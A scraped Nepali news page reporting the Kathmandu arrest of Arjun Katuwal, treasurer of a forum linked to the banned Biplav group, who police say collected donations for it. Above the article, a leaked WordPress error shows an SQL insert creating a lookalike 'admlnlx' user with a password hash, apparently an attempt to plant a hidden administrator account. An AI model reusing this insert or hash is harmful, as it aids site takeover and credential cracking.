WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bf.etOWTIzcltQ92N6HOs5Xv/oxjab1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 21:23:17', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाण्डौ । सरकारले प्रतिबन्धित नेत्र विक्रम चन्द विप्लव समूह नेकपाका केन्द्रीय जनसम्पर्क मञ्चका कोषाध्यक्ष अर्जुन कटुवाल पक्राउ गरेका छन् ।
प्रहरीले कटुवाललाई मंगलबार दिउँसो कलंकीबाट पक्राउ गरेको हो । उनी कलंकीमा ठेक्कापट्टा र निर्माणसम्बन्धि कार्यालय सञ्चाल गरी बसेका थिए ।
कटुवालले व्यवसाय सञ्चालन गरेर बसेपनी विप्लव समुहमा आवद्ध रहेर चन्दा संकलन गर्ने, पक्राउ परेका अन्य नेताकार्यकर्ताको परिवारलाई आर्थिक सहयोग गर्ने गरेको प्रहरीले जनाएको छ ।